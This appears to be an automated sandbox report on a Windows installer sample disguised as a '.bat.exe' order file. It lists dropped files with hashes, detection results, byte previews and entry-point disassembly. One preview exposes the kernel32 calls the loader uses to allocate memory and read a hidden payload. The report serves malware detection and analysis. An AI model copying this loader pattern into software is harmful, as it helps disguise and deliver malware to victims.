                                          SHA-256:785944E57E8E4971F46F84A07D82DEE2AB4E14A68543D83BFE7BE7D5CDA83143
                                          SHA-512:605CEBCC480CB71BA8241782D89E030A5C01E1359ACCBDE174CB6BDAF249167347ECB06E3781CB9B1CC4B465CEF95F1663F0D9766ED84EBADE87AA3970765B3E
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                          Joe Sandbox View:
                                          • Filename: Order 00293884800595.bat.exe, Detection: malicious, Browse
                                          • Filename: 004552024107.bat.exe, Detection: malicious, Browse
                                          • Filename: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, Detection: malicious, Browse
                                          • Filename: Order 00293884800595.bat.exe, Detection: malicious, Browse
                                          • Filename: 004552024107.bat.exe, Detection: malicious, Browse
                                          • Filename: P0-ADFUK.bat.exe, Detection: malicious, Browse
                                          • Filename: P0-ADFUK.bat.exe, Detection: malicious, Browse
                                          Reputation:low
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......4.W.p.9Cp.9Cp.9Cp.8C@.9C..dCy.9C$..Cq.9C$..Cq.9C..=Cq.9CRichp.9C........PE..L....C.f...........!......................... ...............................P............@..........................$....... ..d............................@....................................................... ...............................text...3........................... ..`.rdata....... ......................@..@.data...$....0......................@....reloc..l....@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\004552024107.bat.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):12288
                                          Entropy (8bit):5.744994954995265
                                          Encrypted:false
                                          SSDEEP:192:gFiQJ77pJp17C8F1A5xjGNxrgFOgb7lrT/nC93:E7pJp48F2exrg5F/C
                                          MD5:12B140583E3273EE1F65016BECEA58C4
                                          SHA1:92DF24D11797FEFD2E1F8D29BE9DFD67C56C1ADA
                                          SHA-256:014F1DFEB842CF7265A3644BC6903C592ABE9049BFC7396829172D3D72C4D042
                                          SHA-512:49FFDFA1941361430B6ACB3555FD3AA05E4120F28CBDF7CEAA2AF5937D0B8CCCD84471CF63F06F97CF203B4AA20F226BDAD082E9421B8E6B62AB6E1E9FC1E68A
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          • Antivirus: Virustotal, Detection: 1%, Browse
                                          Joe Sandbox View:
                                          • Filename: Order 00293884800595.bat.exe, Detection: malicious, Browse
                                          • Filename: 004552024107.bat.exe, Detection: malicious, Browse
                                          • Filename: DHL AWB - INVOICE & SHIPPING DOCUMENTS.bat.exe, Detection: malicious, Browse
                                          • Filename: Order 00293884800595.bat.exe, Detection: malicious, Browse
                                          • Filename: 004552024107.bat.exe, Detection: malicious, Browse
                                          • Filename: P0-ADFUK.bat.exe, Detection: malicious, Browse
                                          • Filename: P0-ADFUK.bat.exe, Detection: malicious, Browse
                                          • Filename: pp0fHVNbib.exe, Detection: malicious, Browse
                                          • Filename: pp0fHVNbib.exe, Detection: malicious, Browse
                                          Reputation:moderate, very likely benign file
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L....C.f...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...h....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\004552024107.bat.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):4096
                                          Entropy (8bit):3.327532764383977
                                          Encrypted:false
                                          SSDEEP:48:qKNKyd+Z46pHT1wHsl9rEGbgPgVZShMmj3OPRYBA:5JSRzuHsxE4VH6O+i
                                          MD5:90228DD140188EC0CA02F7F52E4C9A30
                                          SHA1:6880D9AEEC4C97C4B7718044C9C59B92379FEACA
                                          SHA-256:54BCF3D018734B884BD33A74A05EEA0AC3C83501ACBDB71EA8EC56EC9402A263
                                          SHA-512:1A38B1EBB9E2440DD240C8CD2406261E21B544ED392F808D36F78590075F854D89E624589BFDDABCACE96B33A7F3084C7686351BD66AE07EC035BBEF94EF8DA2
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                          Reputation:low
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K..................[.........Rich..........................PE..L....C.f...........!................|........ ...............................P............@.........................@"......l ..<............................@..p.................................................... ..L............................text............................... ..`.rdata....... ......................@..@.data...X....0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\004552024107.bat.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):6656
                                          Entropy (8bit):5.178709395875687
                                          Encrypted:false
                                          SSDEEP:96:z0OBtYZKtPsrqBApt1JHpb9XWk7Qe06iE6mE6YNFyVOHd0+uPHwEX:4tZKtrAJJJbP7iEHEbN8Ved0Ph
                                          MD5:4A2F4FE4A3AD1DE56EE6BF7DD4923963
                                          SHA1:7CC68B94448C964FD99904E5784B059AED4D5DAA
                                          SHA-256:89B1E6509A1B45B32933E9D785A9C8C5B9CE7C616E1112DCF7FC3FA5CA27EBDE
                                          SHA-512:4B6BBE75BEAFAE9A29932FF5DDD3940AADFAE62C157836E6CDAB755955782DD5354D5EB389B4B8C16BF59F4CE7A099A0161D915C1CF2968F28E195DC8E3997EA
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          • Antivirus: Virustotal, Detection: 0%, Browse
                                          Reputation:moderate, very likely benign file
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........PE..L....C.f...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\004552024107.bat.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):25
                                          Entropy (8bit):4.163856189774724
                                          Encrypted:false
                                          SSDEEP:3:+gMn:8
                                          MD5:ECB33F100E1FCA0EB01B36757EF3CAC8
                                          SHA1:61DC848DD725DB72746E332D040A032C726C9816
                                          SHA-256:8734652A2A9E57B56D6CBD22FA9F305FC4691510606BCD2DFCA248D1BF9E79C7
                                          SHA-512:D56951AC8D3EB88020E79F4581CB9282CA40FAA8ADC4D2F5B8864779E28E5229F5DFE13096CF4B373BBC9BC2AC4BFC58955D9420136FB13537F11C137D633C18
                                          Malicious:false
                                          Preview:[Caps]..Setting=Enabled..
                                          Process:C:\Users\user\Desktop\004552024107.bat.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):3011
                                          Entropy (8bit):4.875614577841428
                                          Encrypted:false
                                          SSDEEP:48:Sl+lWlUMDNbr6641SO9Agz4x2qEtyTgz0gWP5CZ9sam0uxKKhY7SDEf:W+lLMDNbr6641S0z4xFEITggV+9zXa3Q
                                          MD5:6103DF2AF52F53D95AF61664D1866FFE
                                          SHA1:6AD99D4586667B497725EEC01AE0A772C441C1D4
                                          SHA-256:6AA446B014371D8DD9EF43D2A103E9CA8A0F61A3AFC4676BFC63AD07C1977C7E
                                          SHA-512:2AFA117DD3ACB8B695FFBC0F236E8B87F1DD4A7EAFD79A26CB4F191EED76DEBA7CBB106F3E78218769581C014840D039A4E173340CA0D6C2D2DFF0B5C5138096
                                          Malicious:false
                                          Preview:...W..n......t......b.5..Cb....&.................:....Q........x.i..../........h....x.`......(...D..x`...........'...M..z..v.........J.;...3...B.......#..s.._......p....q.,.t..........J.............................5...W.;B...G......._.............G.".3...mi..9.=..4.......V........7......@..o.1..n...u......9............=........D...........=.........y..).............Q.q................zG....O.0.}C...@......8.9bg.M...<........r......!Y.J.......A..........;.R............3..\...4.....N.2.X.i.......'.s..0....7....<...6.<......~..........).>..]...;....I...........:...R.....Lg....v..8............m.................T.$......ry5.5......A............M.............p..k..........2...~.k......................Y.Y`...}.....f.......8.PE........m...:.......a~......l-8..P..z..%.0.....]..L:.....E....?9.1.......;...E.....|...t.....n................vH.....u.................Q.<.Y....8......r.v............7........,1....Z.....c..6.G.....xc..j...8.H~....#.........F.,.......{-.VQ..6.v..u..f.....$.
                                          Process:C:\Users\user\Desktop\004552024107.bat.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):3194
                                          Entropy (8bit):4.87998401204962
                                          Encrypted:false
                                          SSDEEP:48:rpEyDeY5QtYx201GaEtVnQvy5Dv6Z3JIV50tFh1FrDopL0AHmEMAaovQIS+GO/m+:fDeATGaETkd5J8e51xMYOey/mgRbP
                                          MD5:73DC0D944FBB5219CEDD966AF6EBB2C8
                                          SHA1:24D17D23C94CFC76FEF577CAF82C6D45B6125591
                                          SHA-256:3C2F20CCCBB8EEC2F5B2A70E44EC1631BFC8070C2F5A9198F1096563A8D0FA52
                                          SHA-512:72FE2BEEAFE7F5296FA346947E0BE3824B934545A299BFCB4AEBA9BD095AA7A2756E42C9D88E5DDDD072C931D35075AED7C7D4E3B641F74A62C96E150C573E4F
                                          Malicious:false
                                          Preview:........F...........].....<.~......d.............Y..1t...o...(...XA...~.h.qE-...KY..........F{....X............E)....x...R}......$$.}..6.......h+...9&.....c.....+.f..d........!.C....E.z../.....MZ............g.......\..?....@.....s..k.P}......$.<...........aE....!q.........*..e.V.q.b..Ui.R..>.h..R.F...........jM.W..G...^.l.....%.........D......*.v.P.=....s<.....D".....0.).$...B......+..*.B......N..o....o../....z..................G..............%..L..Y.....r.B.Zn..I...x...f.............)....6........?..............."..............'....-......G.................x..C...............t....`.................Q.a....}....e...................i.............0.q.....G..#......t....../]..hH.(......C.Y.z4...y........T..E...E....3....i....._........>.?.p...e....y..)?...o..i....5...S.$.....,.............\.......)..u.........8............p..\......... .........3...9....t...._..o......#U...r0..................g..............n.....d.....b....qE...............4..%..j..0Y.P......(.z...........R<C....
                                          Process:C:\Users\user\Desktop\004552024107.bat.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):434
                                          Entropy (8bit):4.287029634434794
                                          Encrypted:false
                                          SSDEEP:12:THnAEO/X/lz5Qxq70QPiETlsieWr5hmhAZYOua3Jy6:kt5CqtPT7rUk3f
                                          MD5:D831A4A6C7B8B672C51DC73C42BF1B99
                                          SHA1:2EFA4039C5CBBE38D45B65CFCD8CB283B0B00F6F
                                          SHA-256:57B3854CDF7B15EB58BFD24E92F41E8B4A513F9A413E7981891B71F5BD56F4B8
                                          SHA-512:D5920BC02B61C18C83CE48D41AE1777F50685766A60CCB6C53161B25E3AFB34A1DDB0E8710C37E3B8B050F772E3EAB3A65FB4ACB093AEFD55AA2FDA74EC6C8F7
                                          Malicious:false
                                          Preview:chertier urduet extrabronchial foruroliger weakliest digesters glansbillederne weretiger superinfiniteness halisteretic udkommentere snowbourn gldstninger..resknderens landhandler ujvnheds rankerne rykkedes,kosos skabelseshistoriens sklves newsmagazine,timberman civilists expection unlowered agrostology landsplanlgnings stereoisomerism.parablen pachydermatoid jumpsuits kraftens estraden.misocapnic blygraa perirraniai flaskebakker,
                                          Process:C:\Users\user\Desktop\004552024107.bat.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):3435
                                          Entropy (8bit):4.910328234136937
                                          Encrypted:false
                                          SSDEEP:48:P/sA7KBdAWdry+HEnrwU7j9mS/QwZ/kQMlzuVm+aAIBzx396upw/QAa/rl0:sA70/BEwy9D/XDVtIBzx3oupIa/6
                                          MD5:4A27BE5B33E9690FFCC4087DE6B78DE1
                                          SHA1:808A634035F94A20441F52F413777897DFD7D3E0
                                          SHA-256:CA6742E9E11A6E3008BAE84674451A7228E0E79F53A34235269984EFAE996C72
                                          SHA-512:6D4114A7DCF410C531465AEE6802A3A0A965864DD4AE65E304188931D17C394B3A700DA6558CCB2BF37AA99906D34A1E38E7CF62E655A6E2EAC3E5CDC38449E9
                                          Malicious:false
                                          Preview:.*.....G.[..........*Wd......^..................;{..+........o..a.....g..2......BN...........m`..{...g..k..(..........Z.s...Z....|.`.$....u..m..@.b.h.........n[.q...!.....(B.C..........4KC..................v.......[.q.i.......ug...g...E.....A..[..o38..........N.^.......y.p.z....._.!..........<.,..I.Y..G................._....;\.&........\.....bu..>...........=...r..y...}....`|7.......w...2...........*od.C.......................... ....................ul._9.4<...~..........................e]...+.....i.......... _....................l...........z.u..2f...4...$.Pg................J............h...D.......R.3..........G!..w.r."..........{.JS8........O.P....m...'.......rS..........1..2....0.......+....M...0.....Y...:.*........Q....g.l.q......'.r$..........7............6.........o..2..5...........%.0...:.........G......................|............._...8.P...................|.......r...........M.......6~...B...g.d.........5....'...................3....Y...}.4L.DT,.....R..Ds....7.........
                                          Process:C:\Users\user\Desktop\004552024107.bat.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1618
                                          Entropy (8bit):4.660461986408
                                          Encrypted:false
                                          SSDEEP:48:mV2wmwMfFEXBaoCpI1sCEVHQTtlgJtScnbhH7D:maNK/0IOQjgJhx
                                          MD5:5A5EB5C7789F88A3DCC3F79DB0AA1A49
                                          SHA1:E67C28DEF4C59F267095C50C6A571AB5B65A9D04
                                          SHA-256:3A7318B3E11D39D783BA8BCCCAD3541B6896A03B1533E4F189DFD1CCC2FF40CE
                                          SHA-512:9762CD2524E971CF672D8DD8F46F4E7EE3F0FF5D91D11801AECB135DF9FBA6FC93D5FCC131879C1D3A81F2734AC5D6E07016E6CEC131A5F51C54CFE0664D0238
                                          Malicious:false
                                          Preview:...b..>.P.....k.................`T...........-.8...$....#P...f..9%......Y.9....o............C...#...............O|......9......u.............e......D=.A...............x...c....5^..?....G..h.....'..........k....../............Bn........i........&..............5Q..4........@..C......7.;....t....5...............C..x..................H...@.....>.......9.h..c......3..9W..$......v.....~.........!.......Y...."X.....N..|......d....Z.[.......+j.....@xB..w..S.........N.............J......u...................n....x....'..R.n.;...=.H`............................3...c.e..F..C.....n.0n..).......Y...Z..0..I.Q...Y.......H-...W..Q......<.`......l.........".S...Mg.8...X.........0/........[..$.........R...p.k-......S....`.....................k.....@......L.8.$....\M..............>.l.................d...O............R....+.................g..x.....>..b......V-..w...../...8......G......Q..........}..G..............'....................v.......m.}:...I$...........".M...J........._*..{...........
                                          Process:C:\Users\user\Desktop\004552024107.bat.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2322
                                          Entropy (8bit):4.685927571910316
                                          Encrypted:false
                                          SSDEEP:48:hKk/USLt/YV/KNG2/Jddel368ugS8jMMccq3mtjzlrNiNviupW9:hb/USL1YV/K/TdeQ8jMMcYn3Opq
                                          MD5:C4A322BD2B1B0FD5130E2119EBE14A09
                                          SHA1:4C0F0F8AAC954E9D599F8C89B340F5C3C4742A6B
                                          SHA-256:063D6E2970210F7A4C74FE744AD76E71650AB5CB974EE4A9AF2BF446D6B2B3BF
                                          SHA-512:64FCE5DC8E510DCCAEA30E2BDB0671C706CECFB4AEC19ECD5B6326E4EE4B1B33A422E917A522F0CFCA184007ABE2B9D89EA401757A637D8D3DFA4B156E58A04A
                                          Malicious:false
                                          Preview:..e..k......Dh........=........z...W...m5K...0...R....4:.L....p.........-.......>...`..#.^.......>...d.d..7..........E...5N...@.......................K......:.o........t....... ......;....e.....R............>......,..&.|...................l+..e....q..Cf....U|..I.X.....U..e.G.....f.........&.......A....................9..}....E...............~.....9...q......T...G.....( ..t..x.......y......[.........Hh....GC9...........Q......C..N..Qt.~.......x.....L.......1.............................T..........V....6.....Ajt..@.....?...............$X.......m.n..........,.U......7.......X.................V........W......\P..............PE.....w......F....:.'9H....;eB.....{+.{.J....s........F....:......X..k.........../.......?.Z..+.....>.F..`1T....2.3.I7...`..{....k.u......b.......J+D...........Y8..y......UU...............3./...... .....[........]N6...y.e.........H..............m...........\.........V..[........W...&.U..........2..r....C....U.3....?...~....Wz......W.....|.C.......a,............
                                          Process:C:\Users\user\Desktop\004552024107.bat.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2438
                                          Entropy (8bit):4.834166284053989
                                          Encrypted:false
                                          SSDEEP:48:QMQ2WErZ2pGC24S3HorZ9JAGA8jkcrbs1DHkkkIq/iSlcHKMVi:X59ys3HorNAGArcr2c/WKWi
                                          MD5:6C88CA43B6FA2E51F1BE781CDF1A7C3E
                                          SHA1:85E53052FFFD4D9AB7FD255A39628FB9D9A4C57D
                                          SHA-256:87747776DBB97E3892F3B4FE2507A907737E3E01F94F88B0D0ED7D849EFD31CF
                                          SHA-512:4B12F969637C61A8F6E1EF79DB3D54DC076672E35B1F67B9742F3B99A38F933298E2DB262A5DB487E281B85BF37FF74FB036E5C5AA3D6844B2D8AC0937B0F483
                                          Malicious:false
                                          Preview:...-....?..A..d.Z..............!.........\..j+.\...E.C..0.6........3.......K....E.....x....g..l.A............Ic........)P.7e.?.......v...|...Q.....h..<.....>........v6.=..;....@...............8,.........W....4.w... ..y......n._...L.IFr.....N...w...U..........H...%.......)......n..<K...:.........o...x..<........0....I...!&.......<.....p..._...........s.......L.......O...F...........p.......c..c.........%.]........X.........-......X.....{.x........^."...x...N....,..........1......)WD.+.[........?P..........4....6...........Z.B............R....;.....e.(.....7...}.........P....3...7B.....(...................................$........O.-"...k....]..........]....F.)...........)......v.....^..Q.......f}......!....0.........=........................m...........A....Q...(w...a......J3...U.n....\0...M..)......Y.....P..#...........p..R........N..^...R.............'.{.............y....g.....^L.......X.............t=z...VP..|.........l..E.-..(..F.....q..I....p..N\.......S.....f1.......4.
                                          Process:C:\Users\user\Desktop\004552024107.bat.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):266786
                                          Entropy (8bit):7.441755496797753
                                          Encrypted:false
                                          SSDEEP:6144:N3pmvG67Y/1IGv+YAyOVtQdDcV8q5RprrJ2Y2f0:Jov7Y/1IGv+7VWqdpcC
                                          MD5:598F1147513FDB125CE4787FA0C55F4B
                                          SHA1:D80A2301BD0BD563DC25F7A1CCA0FE1F6A37E1EA
                                          SHA-256:167D3BB62DFA309B06CED77253BBCC44AE614D891ECA2DDAF01E5B441F273D8B
                                          SHA-512:C1D1E9B0EA45FC665711151C8B056711C7639F64E24870AC899F4F71D21D03B915D7D414A817D27DEAA7BE922614085527ABC19D63AEE85CDC3BA1E679581D52
                                          Malicious:false
                                          Preview:..QQ.......33333........................X...........l.uuuu............................e...Y.............ZZZ.....qqqqqqqq..............................$$$.....7.....nn.................f...................xx..........@.ZZ.....^^...|..(........AAAA.....................................@.XXX....................................33....+++++.........uu............///..............Y.........3.a.....................8........i.y..........1.....9.........................!!.................s.....JJJ....66................A...............>.....R.l............@@.S..........X....Z...]........4........................j.AA......mm...........j.....7....::..........s.nn................'......k.......................................!.............__...Y...k....Y...z....#. ..................................c.......)))).........;........................^^...................9.............vvv........................a.......,,,,.............U......zzz.....v...jj........$$$.."...........'....=......................
                                          Process:C:\Users\user\Desktop\004552024107.bat.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):3794
                                          Entropy (8bit):4.876163305802233
                                          Encrypted:false
                                          SSDEEP:96:LnmpgKl8MI0hs4Qnu6lgB+EQFO+trNMgUIkR:7UpaMI34iu6eBdwO+8rIkR
                                          MD5:0629DF955F60990975A3C8EF199B57E9
                                          SHA1:FE57FA7FDF44B6E789A760C5292FD8DAE221187B
                                          SHA-256:499908BD96C7F2D9BC0F94433CC14C482C002C07A09DF0D73AF45BC17C4DA70B
                                          SHA-512:753EB2360926F32A6ED70E034FEAA57D6274756C3CE60914A4A1EC12DC07ACAC92C7906E3FE48A76F74BBEFBE8EAC023D352D11A087F47DEE9BD0ACBB59331F8
                                          Malicious:false
                                          Preview:.s............W?...T.7.h....~..2....4....`...Z....n..,.....L#.<....`j......U.................l...n.....................j......_...!/...........A........-.......Tk.................W......wv.4.N.....................>....n.T....OP.....%..e..."....,...]U...R. ..4.1k..........3J.%......d.....W............~..z...`........p......~D.....o..[...ib.......C......A..........%.....{.......W.r...............f...h....<...........~.......9.#.......0B>..o..*............,....p........T....J...]Y.S .........#.............................z......3..........{....H....p......v......V..F......,U..=.......R......Q.._.-4........,1...0.............v...z.............2<g.......;....!........g..d.1......d.J-......E.q......,.+...>.4eh...|T.:....B.......C........U......?.>..7.....h.....:...."..!..........6..........................B.@D.W.....8..............t..H.h............................S...h.....x....5......c."...................Q>.....2.5...)....%......T.....v........;1.......x.'.D.....y=.......O........
                                          Process:C:\Users\user\Desktop\004552024107.bat.exe
                                          File Type:Matlab v4 mat-file (little endian) , numeric, rows 1900787, columns 572653568, imaginary
                                          Category:dropped
                                          Size (bytes):13118
                                          Entropy (8bit):4.548296370846384
                                          Encrypted:false
                                          SSDEEP:192:JQVegN3lxyqiaUNZVf5+3cTQXNW14caMbAy2QufEDWpsA:QegN3lIaU7rCNUFuhYWsA
                                          MD5:ABE399FF5EA1CD01BA3DA54BF9C15D99
                                          SHA1:4DC2831A597948CFF07C75C0E7352CB1F7DC51D5
                                          SHA-256:554AC468B8E52B64266E6F0DF630366F603CB9810110EAC1C2ABB05903789922
                                          SHA-512:980F0D9A478BEFFB9D5BE4465160E3D36FCAEFFD5C39222E976784541625E8AD44F9D33C6BE3960B354C6D982B878753E89CC1CC7A2EDCB3900FC898A641BAE0
                                          Malicious:false
                                          Preview:..........""........i..................8....o..................B...................DDD.........k..me...r...n...e...l...3...2...:...:...C..Zr...e.8.a...t..ze...F...i...l..ne...A...(.**m... ...r...4... ...,... ...i... ...0...x...8...0...0.I.0...0...0...0...0...,... ...i..J ..a0...,... ...p... ..v0..4,.O. ...i.BB ...4. .,... ...i... ...0...x...8...0...,.!! ...i... ...0...)...i.......r...8.ttq...k...e...r...n...e..*l..;3.ww2..T:...:.HHS...e.|.t...F..-i...l...e...P..vo...i...n...t...e...r...(...i... ...r...8...,... ...i... ...2...3...0...1...2... ...,... ...i..6 ...0..h,...i... ...0...)...i.......r...4...q...k...e...r...n...e...l...3.gg2...:...:.e.V...i..Zr...t...u...a...l...A.#.l...l..Jo...c...(.,,i..Y ...0...,...i... ...3...7...3...2...2...7...5...2...,... ...i... ...0...x...3...0./.0...0...,... .O.i... ...0...x...4...0...)...p.......r..+2...q...k.!!e..Yr...n...e...l...3...2.B.:...:..#R...e...a...d...F...i...l.!.e...(.eei... ...r...8...,... ..[i... ...r...2...,... ...i... ...3...7...3...2
                                          Process:C:\Users\user\Desktop\004552024107.bat.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):3861
                                          Entropy (8bit):4.8950653795254695
                                          Encrypted:false
                                          SSDEEP:96:GKEfl8Ry/OyCvfcyh5ph9whBJQRaTYbEVr1wbd:MfObXc2h9iQUDZ1y
                                          MD5:2B5A33F2637CE6016495BE603413514E
                                          SHA1:571279989D47FF42C2974CDEDEA4C872CB9424CF
                                          SHA-256:46F41A0D8B9B891702F9ED2FB60FF737A2275011882501155B710EF9BA8577C7
                                          SHA-512:F55FE759C0DF2E8B9E38962E386BEB468FD4442714233F5A5DD13CA10647411FD62D966D8363FE50568F15525EEE815493AEDEF112A6FA6FA0B506A97AF21CF6
                                          Malicious:false
                                          Preview:.N..........b..Q...G..p.1...;...f._......X.........+..................1r.ES...9...~..C...?B...........IpF........0.......3...............S.......w..>?...$.....J...q..............K..................l........................;.......!.....................I.:..................S......4..kZ.../..................d.......a..............cs....9.......l......(....h.....F..'.V..........}..&C.;U..........._...............N..#.V...................:..".............j...?.....K...H.....s................._....L...1.....Z..L........."..........J.......1......`.......1..........@.y.......6...P...]....Z..........................Ob.....L.....U..cZ..n.CXq.........0...q.......K..........U...K....@/..|.......... ..|......pN.E......................>......?..Z=k....<............S......p.<..3..........1o.......Il.....3.y.................2....(.!.i(XC...b...Le..`.........@............*........=.....=v.=.'..>.............?........].Y..m........."$^L..^A...u......O....K9.3.......................;uG..*.
                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                          Entropy (8bit):7.449945084662666
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:004552024107.bat.exe
                                          File size:509'934 bytes
                                          MD5:610c22dff8f1f7d12746e879be25d778
                                          SHA1:158ec97fd4604350430ceeeac61f15f386094e9f
                                          SHA256:72553f4f7953a79115252ea22d00ed3aae235f637ce2e44d531b36af06d9b6cf
                                          SHA512:b6864d1d0479aa9b9d2689519a5f84d7a889e1c21e95dd30edc49235b7873740a92ff5f0ba8a650882e7fa9c1767a7238b63e50f2c9510d5384312f895443fcd
                                          SSDEEP:12288:c19+dlfwYKZWeg6GVH9v7YtI1CWQeUM6WYaCgIwRMaoGiPF:PdloYK7g6GVN7WyUMvIwRgGQ
                                          TLSH:F8B4DF13F727C8EBDA7D13F2A9A2C7771EE41415A971D4DDE3E2BE4B70009252A09368
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.w.F.*.....F...v...F...@...F.Rich..F.........PE..L....C.f.................h...x.......3............@
                                          Icon Hash:eb9b9b2bbb9be371
                                          Entrypoint:0x4033d8
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x660843F9 [Sat Mar 30 16:55:21 2024 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:671f2a1f8aee14d336bab98fea93d734
                                          Instruction
                                          push ebp
                                          mov ebp, esp
                                          sub esp, 00000224h
                                          push esi
                                          push edi
                                          xor edi, edi
                                          push 00008001h
                                          mov dword ptr [ebp-14h], edi
                                          mov dword ptr [ebp-0Ch], 0040A188h
                                          mov dword ptr [ebp-08h], edi
                                          mov byte ptr [ebp-04h], 00000020h
                                          call dword ptr [0040809Ch]
                                          mov esi, dword ptr [004080A0h]
                                          lea eax, dword ptr [ebp-000000C4h]
                                          push eax
                                          mov dword ptr [ebp-000000B0h], edi
                                          mov dword ptr [ebp-30h], edi
                                          mov dword ptr [ebp-2Ch], edi
                                          mov dword ptr [ebp-000000C4h], 0000009Ch
                                          call esi
                                          test eax, eax
                                          jne 00007F754456B8D1h
                                          lea eax, dword ptr [ebp-000000C4h]
                                          mov dword ptr [ebp-000000C4h], 00000094h
                                          push eax
                                          call esi
                                          cmp dword ptr [ebp-000000B4h], 02h
                                          jne 00007F754456B8BCh
                                          movsx cx, byte ptr [ebp-000000A3h]
                                          mov al, byte ptr [ebp-000000B0h]
                                          sub ecx, 30h
                                          sub al, 53h
                                          mov byte ptr [ebp-2Ah], 00000004h
                                          neg al
                                          sbb eax, eax
                                          not eax
                                          and eax, ecx
                                          mov word ptr [ebp-30h], ax
                                          cmp dword ptr [ebp-000000B4h], 02h
                                          jnc 00007F754456B8B4h
                                          and byte ptr [ebp-2Ah], 00000000h
                                          cmp byte ptr [ebp-000000AFh], 00000041h
                                          jl 00007F754456B8A3h
                                          movsx ax, byte ptr [ebp-000000AFh]
                                          sub eax, 40h
                                          mov word ptr [ebp-30h], ax
                                          jmp 00007F754456B896h
                                          mov word ptr [ebp-30h], di
                                          cmp dword ptr [ebp-000000C0h], 0Ah
                                          jnc 00007F754456B89Ah
                                          and word ptr [ebp+00000000h], 0000h
                                          Programming Language:
                                          • [EXP] VC++ 6.0 SP5 build 8804
                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x853c0xa0.rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x430000x33c30.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x80000x294.rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
